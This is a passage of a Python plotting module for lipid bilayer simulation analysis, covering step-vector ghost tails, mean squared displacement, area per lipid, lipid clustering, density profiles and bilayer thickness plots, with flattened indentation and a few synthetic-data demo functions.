for i in range(n_traj):
back_index = i - length
while back_index < 0:
back_index += 1
tails.append([])
for j in range(n_vecs):
x = []
y = []
for k in range(back_index, i+1, group_size):
vec_c = vectors_resnames[k][0][j]
x.append(vec_c[0])
y.append(vec_c[1])
if (i+1 - back_index) % group_size != 0:
vec_c = vectors_resnames[i][0][j]
x.append(vec_c[0])
y.append(vec_c[1])
xx = []
yy = []
n_p = len(x)
for l in range(0, n_p-1):
cx = x[l]
nx = x[l+1]
cy = y[l]
ny = y[l+1]
dx = np.abs(nx - cx)
dy = np.abs(ny - cy)
if dx < periodic_cut and dy < periodic_cut:
xx.append(cx)
yy.append(cy)
else:
xx = []
yy = []
xx.append(x[n_p-1])
yy.append(y[n_p-1])
# print(xx)
xk = np.array(xx)
yk = np.array(yy)
tails[i].append((xk, yk))
return tails
def gen_step_vector_smooth_ghost_tails(vectors_resnames, length=9, window=3, periodic_cut=75.0):
n_traj = len(vectors_resnames)
n_vecs = len(vectors_resnames[0][0])
    # print(n_vecs, n_traj)  # leftover debug output
    smooth_delta = (window - 1) // 2  # integer half-window; true division would yield a float and break range() below
tails = []
for i in range(n_traj):
back_index = i - length
while back_index < 0:
back_index += 1
tails.append([])
#n_vecs = len(vectors_resnames[])
for j in range(n_vecs):
x = []
y = []
for k in range(back_index, i+1):
#print(j, i, k, vectors_resnames[k][1][j], vectors_resnames[i][1][j])
                # print(len(vectors_resnames[k][1]), len(vectors_resnames[i][1]))  # leftover debug output
# if vectors_resnames[k][1][j] != vectors_resnames[i][1][j]:
# quit()
# elif len(vectors_resnames[k][1]) != 300:
# quit()
# elif len(vectors_resnames[i][1]) != 300:
# quit()
#print(j, len(vectors_resnames[k][0]))
#if j >= len(vectors_resnames[k][0]):
# quit()
# j = len(vectors_resnames[k][0])-1
vec_c = vectors_resnames[k][0][j]
x.append(vec_c[0])
y.append(vec_c[1])
xx = []
yy = []
n_p = len(x)
for l in range(0, n_p-1):
cx = x[l]
nx = x[l+1]
cy = y[l]
ny = y[l+1]
dx = np.abs(nx - cx)
dy = np.abs(ny - cy)
#dist = np.sqrt(dx**2 + dy**2)
#print(dx, dy)
if dx < periodic_cut and dy < periodic_cut:
xx.append(cx)
yy.append(cy)
else:
xx = []
yy = []
xx.append(x[n_p-1])
yy.append(y[n_p-1])
n_pp = len(xx)
xxx = []
yyy = []
for k in range(n_pp):
b_i = k - smooth_delta
if b_i < 0:
b_i = 0
f_i = k + smooth_delta
if f_i >= n_pp:
f_i = n_pp-1
#print "k ",k," b_i ",b_i," f_i ",f_i," n_pp ",n_pp
x_s = 0.0
y_s = 0.0
a_s = 0
for l in range(b_i, f_i+1):
#print "k ",k," l ",l
x_s += xx[l]
y_s += yy[l]
a_s += 1
x_s /= a_s
y_s /= a_s
if a_s == window:
xxx.append(x_s)
yyy.append(y_s)
xxx.append(x[n_p-1])
yyy.append(y[n_p-1])
#print(xx)
xk = np.array(xxx)
yk = np.array(yyy)
tails[i].append((xk, yk))
return tails
## incomplete: the forward-tail extension (length_forward) is not yet implemented; as written this duplicates the backward-only smoothing above
def gen_step_vector_smooth_ghost_tails_forwards(vectors_resnames, length_back=9, length_forward=9, window=3, periodic_cut=75.0):
n_traj = len(vectors_resnames)
n_vecs = len(vectors_resnames[0][0])
    smooth_delta = (window - 1) // 2  # integer half-window; true division would yield a float and break range() below
tails = []
# first do tails back
for i in range(n_traj):
back_index = i - length_back
while back_index < 0:
back_index += 1
tails.append([])
for j in range(n_vecs):
x = []
y = []
for k in range(back_index, i+1):
vec_c = vectors_resnames[k][0][j]
x.append(vec_c[0])
y.append(vec_c[1])
xx = []
yy = []
n_p = len(x)
for l in range(0, n_p-1):
cx = x[l]
nx = x[l+1]
cy = y[l]
ny = y[l+1]
dx = np.abs(nx - cx)
dy = np.abs(ny - cy)
#dist = np.sqrt(dx**2 + dy**2)
#print(dx, dy)
if dx < periodic_cut and dy < periodic_cut:
xx.append(cx)
yy.append(cy)
else:
xx = []
yy = []
xx.append(x[n_p-1])
yy.append(y[n_p-1])
n_pp = len(xx)
xxx = []
yyy = []
for k in range(n_pp):
b_i = k - smooth_delta
if b_i < 0:
b_i = 0
f_i = k + smooth_delta
if f_i >= n_pp:
f_i = n_pp-1
#print "k ",k," b_i ",b_i," f_i ",f_i," n_pp ",n_pp
x_s = 0.0
y_s = 0.0
a_s = 0
for l in range(b_i, f_i+1):
#print "k ",k," l ",l
x_s += xx[l]
y_s += yy[l]
a_s += 1
x_s /= a_s
y_s /= a_s
if a_s == window:
xxx.append(x_s)
yyy.append(y_s)
xxx.append(x[n_p-1])
yyy.append(y[n_p-1])
#print(xx)
xk = np.array(xxx)
yk = np.array(yyy)
tails[i].append((xk, yk))
return tails
def plot_step_vectors(vectors_resnames, filename='step_vectors.pdf',save=True,
show=False, scaled=False, wrapped=False,
ghost_tails=None, ghost_tail_alpha=0.5, ghost_tail_arrow=False, ylim=None, xlim=None):
'''
Generates a single plot with the lipid displacement vectors (or step vectors)
Takes a single frame of the output from:
MemSys.StepVector
Corresponding colors (if multiple lipid types are included) can be
generated using:
MemSys.StepVectorColors
'''
color_list = _color_list
_colors = itertools.cycle(('#47d147', '#2929a3', '#e6b800', '#e65c00', '#cc33ff', '#33ccff', '#009999', '#996633', '#666699'))
sns.set_style("whitegrid")
x = vectors_resnames[0][:,0]
y=vectors_resnames[0][:,1]
vx = vectors_resnames[0][:,2]
vy = vectors_resnames[0][:,3]
with plt.rc_context({'figure.figsize': [8.00, 7.25], 'font.size': 16, 'axes.labelsize': 22,
'legend.fontsize': 20,
'xtick.labelsize': 16,
'ytick.labelsize': 16}):
plt.figure()
# plt.style.use('figure.figsize': [14.75, 7.25])
        resnames = sorted(set(vectors_resnames[1]))
        # resnames = ['POPC', 'DOPE', 'TLCL2']  # hardcoded ordering for one specific system; overriding the general set above breaks other compositions
# i = 0
color_dict = {}
color_names = {'POPC':'green', 'DOPE':'blue', 'TLCL2':'gold'}
for res in resnames:
color_dict[res] = next(_colors)
# color_dict['POPC'] = '#1e8449'
colors = []
for residue in vectors_resnames[1]:
colors.append(color_dict[residue])
#print(x)
# Q = plt.quiver(x,y,vx,vy,color=colors)
#vector = np.array([vx[0], vy[1]])
#print("vector 0 length is: {}".format(np.sqrt(np.dot(vector,vector))))
# plot tails first
if ghost_tails is not None:
res = 0
for ghost_tail in ghost_tails:
#print(ghost_tail)
resn = vectors_resnames[1][res]
color = color_dict[resn]
#print(color)
if ghost_tail_arrow:
npoint = len(ghost_tail[0])
# if npoint > 1:
# print(npoint)
# print(range(1, npoint, 1))
# quit()
for iii in range(1, npoint, 1):
x2 = ghost_tail[0][iii]
y2 = ghost_tail[1][iii]
x1 = ghost_tail[0][iii-1]
y1 = ghost_tail[1][iii-1]
#print(iii, x1, y1, x2, y2, npoint)
plt.arrow(x1, y1, x2-x1, y2-y1, width=0.375, length_includes_head=True, alpha=ghost_tail_alpha, linewidth=1.0, color=color, zorder=1)
#break
# if npoint > 1:
# print(npoint)
# print(range(1, npoint, 1))
# quit()
else:
plt.plot(ghost_tail[0], ghost_tail[1], color=color,
alpha=ghost_tail_alpha, linewidth = 1.5)
res += 1
#Now plot the disp vecs
Q = plt.quiver(x, y, vx, vy, color=colors, angles='xy', scale_units='xy', scale=1, zorder=2)
label_string = ""
for resname in resnames:
            label_string += resname + ":" + color_names.get(resname, color_dict[resname]) + " "  # fall back to the assigned color for unlisted lipid types
#dummy_qk = plt.quiverkey(Q, 0.20, 0.975, 2, label_string, labelpos='E',
# coordinates='figure')
#else:
# plt.quiver(x,y,vx,vy)
#plt.title('Lateral Displacement Vectors')
if scaled:
plt.xlabel("x (scaled coordinates)")
plt.ylabel("y (scaled coordinates)")
else:
plt.xlabel("x ($\AA$)")
plt.ylabel("y ($\AA$)")
if ylim is not None:
plt.ylim(ylim)
if xlim is not None:
plt.xlim(xlim)
if scaled and wrapped:
plt.xlim((-0.1, 1.1))
plt.ylim((-0.1, 1.1))
elif scaled and not wrapped:
plt.xlim(-0.2, 1.2)
plt.ylim(-0.1, 1.2)
plt.tight_layout()
if save:
#plt.savefig(filename, transparent=True, bbox_inches='tight')
plt.savefig(filename, transparent=True)
#plt.savefig(filename, bbox_inches='tight')
if show:
return plt.show()
plt.close()
return
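# Hedged usage sketch: plot_step_vectors takes a (frame_array, resnames)
# pair where each row of the N x 4 frame_array is (x, y, dx, dy) for one
# lipid (inferred from the column slicing above); the data here are synthetic.
def _demo_plot_step_vectors():
    rng = np.random.RandomState(1)
    frame = np.zeros((6, 4))
    frame[:, 0:2] = rng.uniform(0.0, 60.0, size=(6, 2))  # x, y positions
    frame[:, 2:4] = rng.normal(0.0, 2.0, size=(6, 2))    # dx, dy steps
    resnames = ['POPC', 'POPC', 'DOPE', 'DOPE', 'TLCL2', 'TLCL2']
    plot_step_vectors((frame, resnames), filename='demo_step_vectors.pdf')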
def plot_step_vectors_comtraj(vectors, colors=None, filename='step_vectors.pdf',show=False, save=True):
'''
Generates a single plot with the lipid displacement vectors (or step vectors)
Takes a single frame of the output from:
MemSys.StepVector
Corresponding colors (if multiple lipid types are included) can be
generated using:
MemSys.StepVectorColors
'''
sns.set_style("whitegrid")
x = vectors[:,0]
y=vectors[:,1]
vx = vectors[:,2]
vy = vectors[:,3]
dummy_step_vec_plot = plt.figure()
if colors is not None:
plt.quiver(x,y,vx,vy,color=colors)
else:
plt.quiver(x,y,vx,vy)
#plt.title('Lateral Displacement Vectors')
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_step_vectors_stroboscopic(vectors_resnames, index=0,
filename='step_vectors_stroboscopic.pdf',
save=True, show=False, scaled=False,
wrapped=False):
'''
Generates a stroboscopic trajectory plot with the displacement vectors
(or step vectors) of a single lipid.
Takes the output from the 'disp_vec' analysis of the bilayer_analyzer:
'''
sns.set_style("whitegrid")
plt.figure()
x = []
y = []
for dv_res in vectors_resnames:
dv = dv_res[0]
x.append(dv[index][0])
y.append(dv[index][1])
#print(x)
#print(y)
Q = plt.plot(x, y)
# label_string = ""
#else:
# plt.quiver(x,y,vx,vy)
#plt.title('Lateral Displacement Vectors')
if scaled:
plt.xlabel("x (scaled coordinates)")
plt.ylabel("y (scaled coordinates)")
else:
plt.xlabel("x ($\AA$)")
plt.ylabel("y ($\AA$)")
if scaled and wrapped:
plt.xlim((-0.1, 1.1))
plt.ylim((-0.1, 1.1))
elif scaled and not wrapped:
plt.xlim(-0.2, 1.2)
plt.ylim(-0.1, 1.2)
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_msd(msd_dat_list,name_list=None,filename='msd.pdf',time_in='ps',time_out='ns',show=False, interval=1,save=True):
'''
Generates a single plot with Mean Squared Displacement curves
Takes outputs from:
MemSys.CalcMSD
MemSys.CalcMSD_parallel
    The outputs are passed to function in a list input: msd_dat_list
'''
# params = {
# 'axes.labelsize': 20,
# 'text.fontsize': 20,
# 'legend.fontsize': 20,
# 'xtick.labelsize': 16,
# 'ytick.labelsize': 16,
# 'text.usetex': False,
# 'figure.figsize': [8.0, 6.0]
# }
# params = {'figure.figsize': [10.0, 8.0]}
# mpl.rcParams.update(params)
#
i = 0
for msd_dat in msd_dat_list:
msd_d = msd_dat.copy()
t = msd_d[::interval,0]
if time_in == 'ps' and time_out == 'ns':
t/=1000.0
elif time_in == 'ns' and time_out == 'ps':
t*=1000.0
msd = msd_d[::interval,1]
if name_list is not None:
plt.plot(t, msd, linewidth=4.0,label=name_list[i])
else:
plt.plot(t, msd, linewidth=4.0)
i+=1
#plt.title("Mean Sqared Displacement vs. Time")
xlabel = "Time ("+time_out+")"
plt.xlabel(xlabel)
plt.ylabel("Distance in the lateral plane ($\AA^2$)")
if name_list is not None:
plt.legend(loc=0)
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
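# Hedged usage sketch (synthetic data): plot_msd reads time from column 0
# and the MSD value from column 1 of each input array.
def _demo_plot_msd():
    t = np.linspace(0.0, 5000.0, 100)        # ps
    msd = np.column_stack((t, 0.02 * t))     # linear toy MSD
    plot_msd([msd], name_list=['toy'], filename='demo_msd.pdf')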
def plot_area_per_lipid(apl_dat_list,name_list=None,filename='apl.pdf',time_in='ps',time_out='ns',save=True,show=False, interval=1, ylim=None, xlim=None):
'''
Generates a single plot with area per lipid (apl) curves
Takes outputs from:
MemSys.CalcAreaPerLipid_Box
MemSys.CalcAreaPerLipid_ClosestNeighborCircle
The outputs are passed to function in a list input: apl_dat_list
'''
#print "filename: ", filename
i = 0
for apl_dat in apl_dat_list:
apl_d = apl_dat.copy()
t = apl_d[::interval,0]
n_points = len(t)
if time_in == 'ps' and time_out == 'ns':
#print "switching time units from ps to ns"
t/=1000.0
elif time_in == 'ns' and time_out == 'ps':
t*=1000.0
apl = apl_d[::interval,2]
apl_dev = apl_d[::interval,3]
if name_list is not None:
#print "plotting",name_list[i]," with errorbars"
#print t
#print apl
#plt.errorbar(t, apl, yerr=apl_dev, label=name_list[i])
if n_points <= 30:
plt.errorbar(t, apl, yerr=apl_dev, label=name_list[i])
else:
p = plt.plot(t, apl, label=name_list[i])
c = p[0].get_color()
plt.fill_between(t, apl-apl_dev, apl+apl_dev, alpha=0.25, interpolate=True, color=c)
else:
if n_points <= 30:
plt.errorbar(t, apl, yerr=apl_dev)
else:
p = plt.plot(t, apl)
c = p[0].get_color()
plt.fill_between(t, apl - apl_dev, apl + apl_dev, alpha=0.25, interpolate=True, color=c)
i+=1
#plt.title("Mean Sqared Displacement vs. Time")
xlabel = "Time ("+time_out+")"
plt.xlabel(xlabel)
plt.ylabel("Area per lipid ($\AA^2$)")
if xlim is not None:
plt.xlim(xlim)
if ylim is not None:
plt.ylim(ylim)
if name_list is not None:
plt.legend(loc=0)
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
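# Hedged usage sketch (synthetic data): plot_area_per_lipid reads time from
# column 0 and the APL mean/deviation from columns 2 and 3 (column 1 is
# unused here).
def _demo_plot_area_per_lipid():
    t = np.linspace(0.0, 10000.0, 50)        # ps
    apl = np.column_stack((t, np.zeros_like(t),
                           64.0 + np.sin(t / 1000.0),
                           0.5 * np.ones_like(t)))
    plot_area_per_lipid([apl], name_list=['toy'], filename='demo_apl.pdf')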
def plot_dc_cluster_dat_number(clust_dat_list,name_list=None,filename='clust_number.pdf',time_in='ps',time_out='ns',
save=True, show=False):
"""Generates a plot of the average number of clusters (vs. time)
This function generates a plot of the average number of clusters vs. time for data output with key 'nclusters'
from the 'dc_cluster' analysis in the BilayerAnalyzer, which corresponds to the
bilayer_analyzer.analysis_protocols.DCClusterProtocol analysis protocol class.
Args:
clust_dat_list (list): This is a list of all data to plot and should be a list of tuples/lists where
each element tuple has the data arrays for each time series curve to include in the plot: e.g.
[ (times_1, means_1, stds_1), (times_2, means_2, stds_2) ]
name_list (list, optional): This is a list of string names to assign each curve included in the plot. It
should have len(name_list) == len(clust_dat_list) = True.
Default: None
        filename (str, optional): This is a string containing the filename for the output plot if save is set to True.
            Default: 'clust_number.pdf'
        time_in (str, optional): This is a string specifying the time units of values in the input arrays. Acceptable values
            are 'ps' for picosecond and 'ns' for nanosecond.
            Default: 'ps'
        time_out (str, optional): This is a string specifying the time units to use in the output plot. Acceptable values
            are 'ps' for picosecond and 'ns' for nanosecond. If this is different than the value for time_in then the time
            values will be scaled accordingly.
Default: 'ns'
save (bool, optional): This is boolean switch to set whether or not to save the generated plot to disc.
plt.savefig is called.
Default: True
show (bool, optional): This is boolean switch to set whether or not the generated plot is displayed in interactive
mode using plt.show.
Default: False
"""
i = 0
for cl_dat in clust_dat_list:
t = cl_dat[0]
if time_in == 'ps' and time_out == 'ns':
#print "switching time units from ps to ns"
t/=1000.0
elif time_in == 'ns' and time_out == 'ps':
t*=1000.0
means = cl_dat[1]
stds = cl_dat[2]
if name_list is not None:
#print "plotting",name_list[i]," with errorbars"
#print t
#print apl
plt.errorbar(t, means, yerr=stds, label=name_list[i])
else:
plt.errorbar(t, means, yerr=stds)
i+=1
#plt.title("Mean Sqared Displacement vs. Time")
xlabel = "Time ("+time_out+")"
plt.xlabel(xlabel)
plt.ylabel("Average Number of Clusters")
if name_list is not None:
plt.legend(loc=0)
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_dc_cluster_dat_size(clust_dat_list,name_list=None,filename='clust_number.pdf',time_in='ps',time_out='ns',
save=True, show=False):
"""Generates a plot of the average cluster size (vs. time)
This function generates a plot of the average cluster size vs. time for data output with key 'avg_size' from the
'dc_cluster' analysis in the BilayerAnalyzer, which corresponds to the
bilayer_analyzer.analysis_protocols.DCClusterProtocol analysis protocol class.
Args:
clust_dat_list (list): This is a list of all data to plot and should be a list of tuples/lists where
each element tuple has the data arrays for each time series curve to include in the plot: e.g.
[ (times_1, means_1, stds_1), (times_2, means_2, stds_2) ]
name_list (list, optional): This is a list of string names to assign each curve included in the plot. It
should have len(name_list) == len(clust_dat_list) = True.
Default: None
        filename (str, optional): This is a string containing the filename for the output plot if save is set to True.
            Default: 'clust_number.pdf'
        time_in (str, optional): This is a string specifying the time units of values in the input arrays. Acceptable values
            are 'ps' for picosecond and 'ns' for nanosecond.
            Default: 'ps'
        time_out (str, optional): This is a string specifying the time units to use in the output plot. Acceptable values
            are 'ps' for picosecond and 'ns' for nanosecond. If this is different than the value for time_in then the time
            values will be scaled accordingly.
Default: 'ns'
save (bool, optional): This is boolean switch to set whether or not to save the generated plot to disc.
plt.savefig is called.
Default: True
show (bool, optional): This is boolean switch to set whether or not the generated plot is displayed in interactive
mode using plt.show.
Default: False
"""
i = 0
for cl_dat in clust_dat_list:
t = cl_dat[0]
if time_in == 'ps' and time_out == 'ns':
#print "switching time units from ps to ns"
t/=1000.0
elif time_in == 'ns' and time_out == 'ps':
t*=1000.0
means = cl_dat[1]
stds = cl_dat[2]
if name_list is not None:
#print "plotting",name_list[i]," with errorbars"
#print t
#print apl
plt.errorbar(t, means, yerr=stds, label=name_list[i])
else:
plt.errorbar(t, means, yerr=stds)
i+=1
#plt.title("Mean Sqared Displacement vs. Time")
xlabel = "Time ("+time_out+")"
plt.xlabel(xlabel)
plt.ylabel("Average Size of Cluster")
if name_list is not None:
plt.legend(loc=0)
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
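# Hedged usage sketch (synthetic data): the dc_cluster plotters take
# (times, means, stds) tuples, one per curve.
def _demo_plot_dc_cluster_size():
    t = np.linspace(0.0, 10000.0, 20)        # ps
    means = 5.0 + np.cos(t / 2000.0)
    stds = 0.4 * np.ones_like(t)
    plot_dc_cluster_dat_size([(t, means, stds)], name_list=['toy'],
                             filename='demo_cluster_size.pdf')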
def plot_dc_cluster_dat_number_comtraj(clust_dat_list,name_list=None,filename='clust_number.pdf',time_in='ps',time_out='ns',show=False):
'''
    Generates a single plot of the average number of clusters (vs. time)
using output data from:
MemSys.CheckClustering
The outputs are passed to function in a list input: clust_dat_list
'''
i = 0
for cl_dat in clust_dat_list:
cl_loc = cl_dat.copy()
t = cl_loc[:,0]
if time_in == 'ps' and time_out == 'ns':
#print "switching time units from ps to ns"
t/=1000.0
elif time_in == 'ns' and time_out == 'ps':
t*=1000.0
cl = cl_loc[:,5]
cl_dev = cl_loc[:,6]
if name_list is not None:
#print "plotting",name_list[i]," with errorbars"
#print t
#print apl
plt.errorbar(t, cl, yerr=cl_dev, label=name_list[i])
else:
plt.errorbar(t, cl, yerr=cl_dev)
i+=1
#plt.title("Mean Sqared Displacement vs. Time")
xlabel = "Time ("+time_out+")"
plt.xlabel(xlabel)
plt.ylabel("Average Number of Clusters")
if name_list is not None:
plt.legend(loc=0)
plt.tight_layout()
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_dc_cluster_dat_size_comtraj(clust_dat_list,name_list=None,filename='clust_size.pdf',time_in='ps',time_out='ns',show=False):
'''
Generates a single plot of the average cluster size (vs time)
using output data from:
MemSys.CheckClustering
The outputs are passed to function in a list input: clust_dat_list
'''
i = 0
for cl_dat in clust_dat_list:
cl_loc = cl_dat.copy()
t = cl_loc[:,0]
if time_in == 'ps' and time_out == 'ns':
#print "switching time units from ps to ns"
t/=1000.0
elif time_in == 'ns' and time_out == 'ps':
t*=1000.0
cl = cl_loc[:,7]
cl_dev = cl_loc[:,8]
if name_list is not None:
#print "plotting",name_list[i]," with errorbars"
#print t
#print apl
plt.errorbar(t, cl, yerr=cl_dev, label=name_list[i])
else:
plt.errorbar(t, cl, yerr=cl_dev)
i+=1
#plt.title("Mean Sqared Displacement vs. Time")
xlabel = "Time ("+time_out+")"
plt.xlabel(xlabel)
plt.ylabel("Average Size of Cluster (lipids per cluster)")
if name_list is not None:
plt.legend(loc=0)
plt.tight_layout()
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_dc_cluster_maps_comtraj(clusters, filename='cluster_map.pdf',show=False):
'''
Generates a single plot of the lipid cluster map
Takes a single frame of the output from:
MemSys.ExportClustersForPlotting
'''
sns.set_style("whitegrid")
x = clusters[0]
y=clusters[1]
c = clusters[2]
plt.scatter(x,y,c=c,s=800)
#plt.title('Lateral Displacement Vectors')
plt.tight_layout()
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_density_profile(dp_out_list, save=True, filename='density_profile.pdf', show=False, label_list=None, ylabel='Density'):
""" Plot density profiles
This function can be used to plot the results of density profiles functions
in the mda_density_profile module.
Args:
dp_out_list (list of tuples): A list of the tuple outputs of the profile calculation functions
save (bool, optional): Default is True. Saves the plot output as an image file if True.
        filename (str, optional): The name of the image file that will be created if save=True.
        show (bool, optional): Default is False. Display the plot (plt.show) if True.
        label_list (list of str : None, optional): Default is None. Allows a list of strings used to
            label the plot lines.
        ylabel (str, optional): Default is 'Density'. The y-axis label.
    """
i = 0
for item in dp_out_list:
if label_list is not None:
plt.plot(item[0], item[1], label=label_list[i])
else:
plt.plot(item[0], item[1])
i+=1
if label_list is not None:
plt.legend(loc=0)
plt.ylabel(ylabel)
plt.xlabel('Position Along the Normal')
#plt.xlabel(ylabel)
#plt.ylabel('Position Along the Normal')
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
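# Hedged usage sketch (synthetic data): each dp_out entry is a
# (positions, density) pair along the bilayer normal.
def _demo_plot_density_profile():
    z = np.linspace(-40.0, 40.0, 81)
    rho = np.exp(-0.5 * ((np.abs(z) - 18.0) / 4.0) ** 2)  # toy leaflet peaks
    plot_density_profile([(z, rho)], label_list=['toy'],
                         filename='demo_density.pdf')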
def plot_grid_as_scatter(in_xyzc, save=True, filename='lipid_grid.pdf', show=False, colorbar=False, cmap=None, vmin=None, vmax=None):
cma = plt.cm.get_cmap('viridis')
if cmap is not None:
cma = cmap
if vmin is not None and vmax is None:
plt.scatter(in_xyzc[0], in_xyzc[1], c=in_xyzc[3], marker='s',s=50, cmap=cma, vmin=vmin)
elif vmax is not None and vmin is None:
plt.scatter(in_xyzc[0], in_xyzc[1], c=in_xyzc[3], marker='s',s=50, cmap=cma, vmax=vmax)
elif vmin is not None and vmax is not None:
plt.scatter(in_xyzc[0], in_xyzc[1], c=in_xyzc[3], marker='s', s=50, cmap=cma, vmin=vmin, vmax=vmax)
else:
plt.scatter(in_xyzc[0], in_xyzc[1], c=in_xyzc[3], marker='s',s=50, cmap=cma)
if colorbar:
plt.colorbar()
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_corr_mat(in_corrmat, save=True, filename='correlation_matrix.pdf', show=False ):
cma = plt.cm.get_cmap('inferno')
plt.imshow(in_corrmat, cmap=cma, interpolation='none', vmin=-1.0, vmax=1.0)
plt.colorbar()
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_corr_mat_as_scatter(in_corrmat, save=True, filename='correlation_matrix.pdf', show=False ):
ax_l = len(in_corrmat)
    # use the builtin int: the np.int alias is removed in recent NumPy
    x_axes = np.zeros(ax_l ** 2, dtype=int)
    y_axes = np.zeros(ax_l ** 2, dtype=int)
c = np.zeros(ax_l ** 2)
k = 0
for i in range(ax_l):
for j in range(ax_l):
x_axes[k] = i
y_axes[k] = j
c[k] = in_corrmat[i, j]
k += 1
cma = plt.cm.get_cmap('viridis')
plt.scatter(x_axes, y_axes, c=c, marker='s', s=10, edgecolors='none', cmap=cma, vmin=-1.0, vmax=1.0)
plt.colorbar()
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
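# Hedged usage sketch (synthetic data): any square matrix with values in
# [-1, 1] can be passed to the correlation-matrix plotters above.
def _demo_plot_corr_mat():
    rng = np.random.RandomState(2)
    a = rng.uniform(-1.0, 1.0, size=(8, 8))
    cm = (a + a.T) / 2.0                     # symmetrize
    np.fill_diagonal(cm, 1.0)
    plot_corr_mat(cm, filename='demo_corr.pdf')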
def plot_average_deuterium_op(dop_dat_list,name_list=None,filename='dop.pdf',time_in='ps',time_out='ns',show=False, interval=1):
'''
Generates a single plot of the average deuterium order parameter vs. time
The outputs are passed to function in a list input: dop_dat_list
'''
#print "filename: ", filename
i = 0
for dop_dat in dop_dat_list:
dop_d = dop_dat.copy()
t = dop_d[::interval,0]
if time_in == 'ps' and time_out == 'ns':
#print "switching time units from ps to ns"
t/=1000.0
elif time_in == 'ns' and time_out == 'ps':
t*=1000.0
dop = dop_d[::interval,4]
dop_dev = dop_d[::interval,5]
if name_list is not None:
#print "plotting",name_list[i]," with errorbars"
#print t
#print dop
plt.errorbar(t, dop, yerr=dop_dev,label=name_list[i])
else:
plt.errorbar(t, dop, yerr=dop_dev)
i+=1
#plt.title("Mean Sqared Displacement vs. Time")
xlabel = "Time ("+time_out+")"
plt.xlabel(xlabel)
plt.ylabel("Average Deuterium Order Parameter")
if name_list is not None:
plt.legend(loc=0)
plt.tight_layout()
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_bilayer_thickness(bt_dat_list,name_list=None,
filename='bilayer_thickness.pdf',
time_in='ps',time_out='ns',show=False,
interval=1, save=True, xlim = None, ylim=None):
'''
Generates a single plot with bilayer thickness curves
Takes outputs from:
The outputs are passed to function in a list input: bt_dat_list
'''
i = 0
for bt_dat in bt_dat_list:
bt_d = bt_dat.copy()
t = bt_d[::interval,0]
if time_in == 'ps' and time_out == 'ns':
t/=1000.0
elif time_in == 'ns' and time_out == 'ps':
t*=1000.0
bt = bt_d[::interval,2]
error = bt_d[::interval,3]
if name_list is not None:
plt.errorbar(t, bt, yerr=error, label=name_list[i])
else:
plt.errorbar(t, bt, yerr=error)
i+=1
#plt.title("Mean Sqared Displacement vs. Time")
xlabel = "Time ("+time_out+")"
plt.xlabel(xlabel)
plt.ylabel("Bilayer thickness ($\AA$)")
if xlim is not None:
plt.xlim(xlim)
if ylim is not None:
plt.ylim(ylim)
if name_list is not None:
plt.legend(loc=0)
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_displacement_lipid_type_cross_correlation(analyzer_data, filename='normal_displacement_lipid_type_cross_correlation.pdf',show=False, save=True):
color_list = _color_list
#build the data objects
leaflets = sorted(list(analyzer_data.keys()), reverse=True)
count = 0
lipid_types = []
yvals = []
yerr = []
for leaflet in leaflets:
for lipid_resname in sorted(analyzer_data[leaflet].keys()):
if leaflet == 'upper':
count+=1
mean = analyzer_data[leaflet][lipid_resname][-1][2]
deviation = analyzer_data[leaflet][lipid_resname][-1][3]
lipid_types.append(lipid_resname)
yvals.append(mean)
yerr.append(deviation)
unique_lipid_types = set(lipid_types)
color_dict = {}
i =0
for l_type in sorted(unique_lipid_types):
color_dict[l_type] = color_list[i]
i+=1
if i == len(unique_lipid_types):
i = 0
colors = []
for l_type in lipid_types:
colors.append(color_dict[l_type])
xval = np.arange(len(yvals))
val_by_lipid = {}
for i in range(len(xval)):
lipid = lipid_types[i]
xv = xval[i]
yv = yvals[i]
ye = yerr[i]
color = colors[i]
if lipid in list(val_by_lipid.keys()):
val_by_lipid[lipid][0].append(xv)
val_by_lipid[lipid][1].append(yv)
val_by_lipid[lipid][2].append(ye)
val_by_lipid[lipid][3].append(color)
val_by_lipid[lipid][4].append(lipid)
else:
val_by_lipid[lipid] = [[xv], [yv], [ye], [color], [lipid]]
width = 0.35
for lipid_resname in sorted(unique_lipid_types):
#print(val_by_lipid[lipid_resname][0])
plt.bar(val_by_lipid[lipid_resname][0], val_by_lipid[lipid_resname][1], width,
yerr=val_by_lipid[lipid_resname][2], color=val_by_lipid[lipid_resname][3][0],
label=lipid_resname,
error_kw=dict(ecolor=val_by_lipid[lipid_resname][3][0], lw=2, capsize=5, capthick=2))
line_xval = [xval[count-1]+0.5+(width/2.0), xval[count-1]+0.5+(width/2.0)]
line_yval = [min(yvals)-max(yerr), max(yvals)+1.25*max(yerr)]
plt.plot(line_xval, line_yval, color='black')
plt.plot([0, max(xval)+1], [0.0, 0.0], 'k--')
plt.text(xval[0]+0.25, max(yvals)+1.25*max(yerr), 'upper leaflet')
plt.text(xval[count], max(yvals) + 1.25 * max(yerr), 'lower leaflet')
plt.legend(loc=0)
plt.xlabel('Lipid type')
plt.ylabel('Cross correlation')
plt.tick_params(labelbottom=False)
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_position_density_map_2d_scatter(x_centers, y_centers, counts,
save=True,
filename='position_density_2d.pdf',
show=False, colorbar=True,
vmin=0.0, vmax=None,
normalized=False,
scaled_to_max=False):
cma = plt.cm.get_cmap('jet')
x_pos = []
y_pos = []
color_vals = []
for i in range(len(x_centers)):
for j in range(len(y_centers)):
x_pos.append(x_centers[i])
y_pos.append(y_centers[j])
